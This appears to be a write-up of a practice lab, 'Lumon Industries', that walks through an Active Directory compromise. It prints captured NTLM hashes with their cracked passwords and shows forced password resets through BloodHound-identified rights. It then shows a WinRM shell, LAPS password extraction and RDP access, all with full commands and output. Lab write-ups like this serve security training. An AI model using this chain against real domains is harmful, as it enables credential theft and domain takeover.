> For the complete documentation index, see [llms.txt](https://truck-2-tech-security.gitbook.io/writeups-and-labs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://truck-2-tech-security.gitbook.io/writeups-and-labs/security-research/hacksmarter-labs/lumon-industries.md).

# Lumon Industries

## **Objective / Scope**

Lumon Industries will soon be integrating a high-value employee into the organization. In accordance with internal security protocols, a comprehensive penetration test and internal access verification must be conducted prior to full onboarding.

For the purposes of this evaluation, you will be provided the assigned credentials and access permissions corresponding to the subject employee. Your objective is to assess the scope and boundaries of these permissions, ensuring compliance with all Lumon security standards and operational safeguards.

#### **Starting Credentials**

```
hellyr:H3lenaR!2025
```

## Intranet

### Enumeration

#### Nmap

```jsx
PORT      STATE SERVICE            REASON          VERSION
80/tcp    open  http               syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to <https://intranet.lumons.hacksmarter/>
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
135/tcp   open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack ttl 126 Microsoft Windows netbios-ssn
443/tcp   open  ssl/http           syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=intranet.lumons.hacksmarter
| Subject Alternative Name: DNS:intranet.lumons.hacksmarter
| Issuer: commonName=intranet.lumons.hacksmarter
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-09T20:29:11
| Not valid after:  2030-10-09T20:39:09
| MD5:   bcc615e63ad01fc0bf265af4e1123f41
| SHA-1: d6ed2dde5b5ec1f594c80041523dd022ecc0f406
| -----BEGIN CERTIFICATE-----
| MIIDTjCCAjagAwIBAgIQFC0VEg4LMppBIfUHgIixFjANBgkqhkiG9w0BAQsFADAm
| MSQwIgYDVQQDDBtpbnRyYW5ldC5sdW1vbnMuaGFja3NtYXJ0ZXIwHhcNMjUxMDA5
| MjAyOTExWhcNMzAxMDA5MjAzOTA5WjAmMSQwIgYDVQQDDBtpbnRyYW5ldC5sdW1v
| bnMuaGFja3NtYXJ0ZXIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCz
| hxtPkvILibzJPOYEGnzR1quGyw/DlWzTw4nC0g/7Sb6uC2DUq9ytflCWp0qZ4aYO
| bUoych8bN7ToZGFUAE8ms0favWsXEaGw7mQTuz00MPnSBethCvV4xledAF/UzTtD
| 6FvSEulNe5xznqdWdUoRlO1cw67feBHYtXkuuj9w8aiTzlDwj+1fdMoDyiCiarYO
| TqoaQt8Aqtb20wQZYxYqA7MAXTKE856NOisdqBOlm8xkZJdHr/tVWtPcPX3mvai/
| QZniIDombz018fOliMgHYLfRdN5PyhPNH/gozxDboq7lG38RAvO2ZIlYS0NxvKHs
| 0kzhYvCkHFuP+VTXEEE1AgMBAAGjeDB2MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUE
| FjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwJgYDVR0RBB8wHYIbaW50cmFuZXQubHVt
| b25zLmhhY2tzbWFydGVyMB0GA1UdDgQWBBS66pDOI/ga6DCBkim7tVh5LdtYhzAN
| BgkqhkiG9w0BAQsFAAOCAQEAHUf/LXzIGpswOAvdIP6GFDktZvUY4zoOgjQ4tSXr
| DztqNSPeaMQc4tW3xQOkzuu6+pRZUpqpnVZ2mPhlHI6AtjNWV/sQixvTFicryJTS
| nGP8gHoqbTF02GC/cBK+04DZkG8t2atbZd9pSkY4DR+YGcvJRZBpgk1ix2MgUTqT
| e98+9gZvRjHFgoWvgIXsA2insAl5gqVcdCbH6mNtLfu5B8FmkhiTpYlnc2dJhJ9i
| Uu6Lamm8XSe1UMYDmKZ2Nepu3OJcEXLmnKZrfLCdTUA39zJLk/q5wuWIbaSzhpbz
| K6jvyxAyOC9Vv0nLtmINV1gTqhvKUb32zRW58g9Ryx/g8Q==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| http-server-header:
|   Microsoft-IIS/10.0
|_  waitress
| tls-alpn:
|_  http/1.1
|_http-title: Did not follow redirect to <https://intranet.lumons.hacksmarter/>
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
445/tcp   open  microsoft-ds?      syn-ack ttl 126
3389/tcp  open  ssl/ms-wbt-server? syn-ack ttl 126
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info:
|   Target_Name: LUMONS
|   NetBIOS_Domain_Name: LUMONS
|   NetBIOS_Computer_Name: INTRANET
|   DNS_Domain_Name: lumons.hacksmarter
|   DNS_Computer_Name: Intranet.lumons.hacksmarter
|   DNS_Tree_Name: lumons.hacksmarter
|   Product_Version: 10.0.26100
|_  System_Time: 2026-02-09T02:50:23+00:00
| ssl-cert: Subject: commonName=Intranet.lumons.hacksmarter
| Issuer: commonName=Intranet.lumons.hacksmarter
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-08T20:18:09
| Not valid after:  2026-04-09T20:18:09
| MD5:   3a80706509e7d5dd22f329c98bc66cee
| SHA-1: 0a72ecd3abc76ede345396ef6cbbe82f3392e554
| -----BEGIN CERTIFICATE-----
| MIIC+jCCAeKgAwIBAgIQXC+KnND6UKdNzozbKJm7CjANBgkqhkiG9w0BAQsFADAm
| MSQwIgYDVQQDExtJbnRyYW5ldC5sdW1vbnMuaGFja3NtYXJ0ZXIwHhcNMjUxMDA4
| MjAxODA5WhcNMjYwNDA5MjAxODA5WjAmMSQwIgYDVQQDExtJbnRyYW5ldC5sdW1v
| bnMuaGFja3NtYXJ0ZXIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC1
| /Q9+FtNvNAmTEiP6WDYzF+h0jPdjg2H3FtBFxN70s+B+6BjhEZc51YchvdXzFYeV
| SaFvKD/h4bYUwq820QXfRhEM8z5se/BRKE6TQL2UdIDXDWzuUcm54E3aE5gHcV/h
| RBV/AkxzC1TcPjsumdTa0Z17To5EBfLdGr0pPR7Ad7rx0wbsMvTj2kEbmTYGpU+1
| ioy385JlQOfxMQxUKGpzb85oIV6DT5X8uMZJMzH+5dcjBW3rsUjj+fKhsTQLPVON
| CRNAgegwTXUUVbDUo4fcrYsbFTfYL2FBSzmWoQUmlPIWalw7U/5PjNMyE+A47CKS
| BLkhBPPASHDoom3vNBqZAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsG
| A1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAI9NqbnFo6cJAJ/UH9X61SKwi
| ZtaUTKcXOAAvzxk23yVbJBid9oVaA691OiDsZX+H17hGaC+xBjixVesqImlZqDMe
| cxjUAoCLGpb9Dk/gjCkDLp2ZRdvBBmYewT+Nbv6Eo79F9VIbYy4qDx0hhbdU7aXT
| 5yr0reYrd8SQ7YQL7W9IeH7pQ23tB3982ZrcwXuy6lu/le2wjXX0fB2GvSqYBs9A
| KETvZUs6bSlldN812nQO1Vwhlnn82KS7WWL0Yuc4dgZyaV11BDd6birtmpYFILVj
| m49/bIGcEI8yWrO7RxZuzxwgQGJCDkuEB16Qe/A/OhFyrcqFzynaplc+hqGciQ==
|_-----END CERTIFICATE-----
5985/tcp  open  http               syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49686/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
49691/tcp open  msrpc              syn-ack ttl 126 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): FreeBSD 6.X (86%)
OS CPE: cpe:/o:freebsd:freebsd:6.2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: FreeBSD 6.2-RELEASE (86%)

Uptime guess: 0.006 days (since Sun Feb  8 20:41:51 2026)
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 43864/tcp): CLEAN (Timeout)
|   Check 2 (port 61799/tcp): CLEAN (Timeout)
|   Check 3 (port 26178/udp): CLEAN (Timeout)
|   Check 4 (port 44236/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-02-09T02:50:23
|_  start_date: N/A

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   32.32 ms 10.200.0.1
2   ...
3   33.75 ms 10.0.23.116

```

* Set `/etc/hosts` to `intranet.lumon.hacksmarter`

#### HTTPS

![image.png](/files/hCJFbiyp4oY2pUuxvxtY)

* Some potential username enumeration:
  * Alice
  * Bob
  * Carol
  * Dave

#### Creds work to log into the intranet

![image.png](/files/boCk14b1xqcaOivrUCdz)

* Nothing really in this, although I did see some CSS mentioning admin section

#### Wappalyzer

Nothing here

Was able to use the following CVE to get a malicious link on the share that I could write to and then capture a hash via responder:

```bash
HARMONYC::LUMONS:1122334455667788:a8f0d4e4e11e99a58003c5d4b877c925:01010000000000008001bd17949bdc01cc1ed2bd598bcf0e000000000200080035004a0032004d0001001e00570049004e002d005800560051004f00480032003900350052005200310004003400570049004e002d005800560051004f0048003200390035005200520031002e0035004a0032004d002e004c004f00430041004c000300140035004a0032004d002e004c004f00430041004c000500140035004a0032004d002e004c004f00430041004c00070008008001bd17949bdc01060004000200000008003000300000000000000000000000003000000e93c10d3e71f38d37b2bc3b02ac92582c4b92843580908741bc65548dc2050c0a001000000000000000000000000000000000000900240063006900660073002f00310030002e003200300030002e00330034002e003200300031000000000000000000:h@rmony08
```

```bash
harmonyc:h@rmony08
```

### Ingesting into bloodhound

I see that the `harmonyc` user is part of the Administrators group, but other than that, not much

Using the credentials on the Intranet, I can see the admin panel. It did not occur to me to use the browse file share to put in my kali ip and “shares” (\\\\\<IP>\shares) but after the hint, I was able to fire up responder and capture the hash of the intranetsvc account

```bash
INTRANETSVC::LUMONS:ee51003a1f9a40c0:4ba013817fc23f403afd7ee4f99a2622:010100000000000080da8b335c9cdc0159a1455104f4f6d20000000002000800420056004500360001001e00570049004e002d003100330056005a00310054004600410051005000340004003400570049004e002d003100330056005a0031005400460041005100500034002e0042005600450036002e004c004f00430041004c000300140042005600450036002e004c004f00430041004c000500140042005600450036002e004c004f00430041004c000700080080da8b335c9cdc01060004000200000008003000300000000000000001000000002000006b801db35916376e41041ecad3a2e77066c25ebc8c7d76ad94c7290fe26f8e1f0a001000000000000000000000000000000000000900240063006900660073002f00310030002e003200300030002e00330034002e003200300031000000000000000000:Servicesince1979
```

```bash
intranetsvc:Servicesince1979
```

Checking the validity of the credentials and then seeing what shares are available to this user

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb 10.0.23.116 -u intranetsvc -p 'Servicesince1979' --shares                                     
SMB         10.0.23.116     445    INTRANET         [*] Windows 11 / Server 2025 Build 26100 x64 (name:INTRANET) (domain:lumons.hacksmarter) (signing:False) (SMBv1:None)
SMB         10.0.23.116     445    INTRANET         [+] lumons.hacksmarter\\intranetsvc:Servicesince1979 
SMB         10.0.23.116     445    INTRANET         [*] Enumerated shares
SMB         10.0.23.116     445    INTRANET         Share           Permissions     Remark
SMB         10.0.23.116     445    INTRANET         -----           -----------     ------
SMB         10.0.23.116     445    INTRANET         ADMIN$                          Remote Admin
SMB         10.0.23.116     445    INTRANET         C$                              Default share
SMB         10.0.23.116     445    INTRANET         IPC$            READ            Remote IPC
SMB         10.0.23.116     445    INTRANET         MDRepo                          
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb 10.0.21.189 -u intranetsvc -p 'Servicesince1979' --shares
SMB         10.0.21.189     445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:lumons.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                     
SMB         10.0.21.189     445    DC01             [+] lumons.hacksmarter\\intranetsvc:Servicesince1979 
SMB         10.0.21.189     445    DC01             [*] Enumerated shares
SMB         10.0.21.189     445    DC01             Share           Permissions     Remark
SMB         10.0.21.189     445    DC01             -----           -----------     ------
SMB         10.0.21.189     445    DC01             ADMIN$                          Remote Admin
SMB         10.0.21.189     445    DC01             C$                              Default share
SMB         10.0.21.189     445    DC01             IPC$            READ            Remote IPC
SMB         10.0.21.189     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.0.21.189     445    DC01             SYSVOL          READ            Logon server share 
```

Checking bloodhound for the `intranetsvc` user, I have `forcechangepassword` on the following individuals:

![image.png](/files/lxouakE12UF2ij0hIqAR)

Checking the memberships or targets of interest:

* chernandez - certificate service dcom access
* smartinez - same as chernandez
* jbrown - same as above
* <mark style="color:$danger;">peterk - web admins; lapsadmins; certificate service dcom access</mark>
* <mark style="color:$warning;">marks - certificate service dcom access; microdata refinement; lapsadmins</mark>

### Will target `peterk` first since they have lapsadmins group perms

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ bloodyAD -u 'IntranetSvc' -p 'Servicesince1979' --host DC01.lumons.hacksmarter set password 'PETERK' 'Hacksmarter123!'
[+] Password changed successfully!
```

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb 10.0.21.189 -u peterk -p 'Hacksmarter123!' --shares
SMB         10.0.21.189     445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:lumons.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                     
SMB         10.0.21.189     445    DC01             [-] Connection Error: The NETBIOS connection with the remote host timed out.
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb 10.0.21.189 -u PETERK -p 'Hacksmarter123!' --shares
SMB         10.0.21.189     445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:lumons.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                     
SMB         10.0.21.189     445    DC01             [-] Connection Error: The NETBIOS connection with the remote host timed out.
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb 10.0.23.116 -u peterk -p 'Hacksmarter123!' --shares
SMB         10.0.23.116     445    INTRANET         [*] Windows 11 / Server 2025 Build 26100 x64 (name:INTRANET) (domain:lumons.hacksmarter) (signing:False) (SMBv1:None)
SMB         10.0.23.116     445    INTRANET         [-] Connection Error: The NETBIOS connection with the remote host timed out.
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb INTRANET -u peterk -p 'Hacksmarter123!'         
SMB         10.0.23.116     445    INTRANET         [*] Windows 11 / Server 2025 Build 26100 x64 (name:INTRANET) (domain:lumons.hacksmarter) (signing:False) (SMBv1:None)
SMB         10.0.23.116     445    INTRANET         [-] Connection Error: The NETBIOS connection with the remote host timed out.
                                                                                                                                     
```

* Why does this keep happening?

Checking bloodhound

![image.png](/files/9XR9o1GPTixQYYckIST2)

Like mentioned above, `marks` is also a lapsadmin member

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ bloodyAD -u 'IntranetSvc' -p 'Servicesince1979' --host DC01.lumons.hacksmarter set password 'MARKS' 'Hacksmarter123!'
[+] Password changed successfully!
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb INTRANET -u marks -p 'Hacksmarter123!'                                                                 
SMB         10.0.23.116     445    INTRANET         [*] Windows 11 / Server 2025 Build 26100 x64 (name:INTRANET) (domain:lumons.hacksmarter) (signing:False) (SMBv1:None)
SMB         10.0.23.116     445    INTRANET         [+] lumons.hacksmarter\\marks:Hacksmarter123! 
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb INTRANET -u marks -p 'Hacksmarter123!' --shares
SMB         10.0.23.116     445    INTRANET         [*] Windows 11 / Server 2025 Build 26100 x64 (name:INTRANET) (domain:lumons.hacksmarter) (signing:False) (SMBv1:None)
SMB         10.0.23.116     445    INTRANET         [+] lumons.hacksmarter\\marks:Hacksmarter123! 
SMB         10.0.23.116     445    INTRANET         [*] Enumerated shares
SMB         10.0.23.116     445    INTRANET         Share           Permissions     Remark
SMB         10.0.23.116     445    INTRANET         -----           -----------     ------
SMB         10.0.23.116     445    INTRANET         ADMIN$                          Remote Admin
SMB         10.0.23.116     445    INTRANET         C$                              Default share
SMB         10.0.23.116     445    INTRANET         IPC$            READ            Remote IPC
SMB         10.0.23.116     445    INTRANET         MDRepo          READ,WRITE      
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ nxc smb DC01 -u marks -p 'Hacksmarter123!' --shares
SMB         10.0.21.189     445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:lumons.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                                                                     
SMB         10.0.21.189     445    DC01             [+] lumons.hacksmarter\\marks:Hacksmarter123! 
SMB         10.0.21.189     445    DC01             [*] Enumerated shares
SMB         10.0.21.189     445    DC01             Share           Permissions     Remark
SMB         10.0.21.189     445    DC01             -----           -----------     ------
SMB         10.0.21.189     445    DC01             ADMIN$                          Remote Admin
SMB         10.0.21.189     445    DC01             C$                              Default share
SMB         10.0.21.189     445    DC01             IPC$            READ            Remote IPC
SMB         10.0.21.189     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.0.21.189     445    DC01             SYSVOL          READ            Logon server share 
```

## User.txt

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ evil-winrm -i DC01 -u 'marks' -p 'Hacksmarter123!'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
^C
                                        
Warning: Press "y" to exit, press any other key to continue
                                        
Info: Exiting...
                                                                                                                                                             
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ evil-winrm -i INTRANET -u 'marks' -p 'Hacksmarter123!'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\MarkS\\Documents> type C:\\Users\\MarkS\\Desktop\\user.txt
249d9efcda06d2ec368f7cb4f2e8510a
*Evil-WinRM* PS C:\\Users\\MarkS\\Documents> 
```

```bash
249d9efcda06d2ec368f7cb4f2e8510a
```

The next obvious step to everyone but me, is since this person has localadmin group privs, we can see the localadmin password on the INTRANET machine:

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ sudo nxc ldap DC01 -d DC01.lumons.hacksmarter -u 'marks' -p 'Hacksmarter123!' --module laps 
LDAP        10.0.21.189     389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:DC01.lumons.hacksmarter) (signing:Enforced) (channel binding:When Supported)
LDAP        10.0.21.189     389    DC01             [+] DC01.lumons.hacksmarter\\marks:Hacksmarter123! 
LAPS        10.0.21.189     389    DC01             [*] Getting LAPS Passwords
LAPS        10.0.21.189     389    DC01             Computer:INTRANET$ User:localadmin      Password:PonySpillStraySkierDiskPond💡
```

{% hint style="info" %}
Just be sure to use the above, because the syntax is pretty picky
{% endhint %}

```bash
localadmin:PonySpillStraySkierDiskPond
```

### We want to see if we can get an RDP session on this (I already had one as Mark Scout `marks`)

```bash
┌──(kali㉿kali)-[~/hsm/lumon]
└─$ xfreerdp3 /u:localadmin /p:'PonySpillStraySkierDiskPond' /v:10.0.23.116:3389 +dynamic-resolution
```

![image.png](/files/a1XbLoCoEhVlttdHuK1C)

I’m going to enumerate a bit as the localadmin user

### systeminfo

```bash
C:\\Windows\\System32>systeminfo

Host Name:                     INTRANET
OS Name:                       Microsoft Windows Server 2025 Datacenter
OS Version:                    10.0.26100 N/A Build 26100
OS Manufacturer:               Microsoft Corporation
OS Configuration:              Member Server
OS Build Type:                 Multiprocessor Free
Registered Owner:              EC2
Registered Organization:       Amazon.com
Product ID:                    00491-50000-00001-AA049
Original Install Date:         10/9/2025, 3:42:43 AM
System Boot Time:              2/14/2026, 1:43:42 AM
System Manufacturer:           Amazon EC2
System Model:                  t3.small
System Type:                   x64-based PC
Processor(s):                  1 Processor(s) Installed.
                               [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz
BIOS Version:                  Amazon EC2 1.0, 10/16/2017
Windows Directory:             C:\\Windows
System Directory:              C:\\Windows\\system32
Boot Device:                   \\Device\\HarddiskVolume2
System Locale:                 en-us;English (United States)
Input Locale:                  en-us;English (United States)
Time Zone:                     (UTC) Coordinated Universal Time
Total Physical Memory:         1,894 MB
Available Physical Memory:     252 MB
Virtual Memory: Max Size:      5,734 MB
Virtual Memory: Available:     3,589 MB
Virtual Memory: In Use:        2,145 MB
Page File Location(s):         C:\\pagefile.sys
Domain:                        lumons.hacksmarter
Logon Server:                  \\\\INTRANET
Hotfix(s):                     3 Hotfix(s) Installed.
                               [01]: KB5049622
                               [02]: KB5053598
                               [03]: KB5052915
Network Card(s):               1 NIC(s) Installed.
                               [01]: Amazon Elastic Network Adapter
                                     Connection Name: Ethernet
                                     DHCP Enabled:    Yes
                                     DHCP Server:     10.0.20.1
                                     IP address(es)
                                     [01]: 10.0.23.116
                                     [02]: fe80::c18e:2c3b:6ec7:41d2
Virtualization-based security: Status: Running
                               Required Security Properties:
                               Available Security Properties:
                                     Base Virtualization Support
                                     DMA Protection
                                     UEFI Code Readonly
                                     Mode Based Execution Control
                               Services Configured:
                               Services Running:
                                     Credential Guard
                               App Control for Business policy: Enforced
                               App Control for Business user mode policy: Off
                               Security Features Enabled:
Hyper-V Requirements:          A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

### network information

```bash
C:\\Windows\\System32>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : Intranet
   Primary Dns Suffix  . . . . . . . : lumons.hacksmarter
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : ec2.internal
                                       us-east-1.ec2-utilities.amazonaws.com
                                       lumons.hacksmarter

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Amazon Elastic Network Adapter
   Physical Address. . . . . . . . . : 02-3A-18-A8-B6-EB
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::c18e:2c3b:6ec7:41d2%3(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.0.23.116(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.252.0
   Lease Obtained. . . . . . . . . . : Saturday, February 14, 2026 1:44:34 AM
   Lease Expires . . . . . . . . . . : Saturday, February 14, 2026 2:44:36 AM
   Default Gateway . . . . . . . . . : 10.0.20.1
   DHCP Server . . . . . . . . . . . : 10.0.20.1
   DHCPv6 IAID . . . . . . . . . . . : 84821943
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-31-1B-01-FB-02-3A-18-A8-B6-EB
   DNS Servers . . . . . . . . . . . : 10.0.0.58
   NetBIOS over Tcpip. . . . . . . . : Enabled

C:\\Windows\\System32>route print
===========================================================================
Interface List
  3...02 3a 18 a8 b6 eb ......Amazon Elastic Network Adapter
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0        10.0.20.1      10.0.23.116     20
        10.0.20.0    255.255.252.0         On-link       10.0.23.116    276
      10.0.23.116  255.255.255.255         On-link       10.0.23.116    276
      10.0.23.255  255.255.255.255         On-link       10.0.23.116    276
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  169.254.169.123  255.255.255.255         On-link       10.0.23.116     40
  169.254.169.249  255.255.255.255         On-link       10.0.23.116     40
  169.254.169.250  255.255.255.255         On-link       10.0.23.116     40
  169.254.169.251  255.255.255.255         On-link       10.0.23.116     40
  169.254.169.253  255.255.255.255         On-link       10.0.23.116     40
  169.254.169.254  255.255.255.255         On-link       10.0.23.116     40
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link       10.0.23.116    276
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link       10.0.23.116    276
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    331 ::1/128                  On-link
  3     40 fd00:ec2::123/128        On-link
  3     40 fd00:ec2::250/128        On-link
  3     40 fd00:ec2::253/128        On-link
  3     40 fd00:ec2::254/128        On-link
  3    276 fe80::/64                On-link
  3    276 fe80::c18e:2c3b:6ec7:41d2/128
                                    On-link
  1    331 ff00::/8                 On-link
  3    276 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

C:\\Windows\\System32>arp -a

Interface: 10.0.23.116 --- 0x3
  Internet Address      Physical Address      Type
  10.0.20.1             02-26-93-20-a6-bd     dynamic
  10.0.21.189           02-4c-69-ae-64-47     dynamic
  10.0.23.255           ff-ff-ff-ff-ff-ff     static
  169.254.169.123       02-26-93-20-a6-bd     dynamic
  169.254.169.250       02-26-93-20-a6-bd     dynamic
  169.254.169.254       02-26-93-20-a6-bd     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static

C:\\Windows\\System32>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       992
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       560
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       736
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       612
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1092
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1380
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       736
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       1976
  TCP    0.0.0.0:49682          0.0.0.0:0              LISTENING       704
  TCP    10.0.23.116:139        0.0.0.0:0              LISTENING       4
  TCP    10.0.23.116:3389       10.0.0.247:60094       ESTABLISHED     560
  TCP    10.0.23.116:49820      104.208.203.88:443     ESTABLISHED     1380
  TCP    10.0.23.116:49895      52.110.2.187:443       ESTABLISHED     2900
  TCP    10.0.23.116:49902      52.110.2.200:443       ESTABLISHED     2900
  TCP    10.0.23.116:50074      52.110.2.133:443       ESTABLISHED     5020
  TCP    10.0.23.116:50076      52.110.2.148:443       ESTABLISHED     5020
  TCP    10.0.23.116:50109      52.123.129.14:443      ESTABLISHED     2584
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       992
  TCP    [::]:443               [::]:0                 LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3389              [::]:0                 LISTENING       560
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       736
  TCP    [::]:49665             [::]:0                 LISTENING       612
  TCP    [::]:49666             [::]:0                 LISTENING       1092
  TCP    [::]:49667             [::]:0                 LISTENING       1380
  TCP    [::]:49668             [::]:0                 LISTENING       736
  TCP    [::]:49669             [::]:0                 LISTENING       1976
  TCP    [::]:49682             [::]:0                 LISTENING       704
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:443  [fe80::c18e:2c3b:6ec7:41d2%3]:50103  CLOSE_WAIT      4
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:443  [fe80::c18e:2c3b:6ec7:41d2%3]:50107  CLOSE_WAIT      4
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:443  [fe80::c18e:2c3b:6ec7:41d2%3]:50112  CLOSE_WAIT      4
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:50103  [fe80::c18e:2c3b:6ec7:41d2%3]:443  FIN_WAIT_2      3628
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:50107  [fe80::c18e:2c3b:6ec7:41d2%3]:443  FIN_WAIT_2      3628
  TCP    [fe80::c18e:2c3b:6ec7:41d2%3]:50112  [fe80::c18e:2c3b:6ec7:41d2%3]:443  FIN_WAIT_2      3628
  UDP    0.0.0.0:123            *:*                                    1112
  UDP    0.0.0.0:500            *:*                                    1380
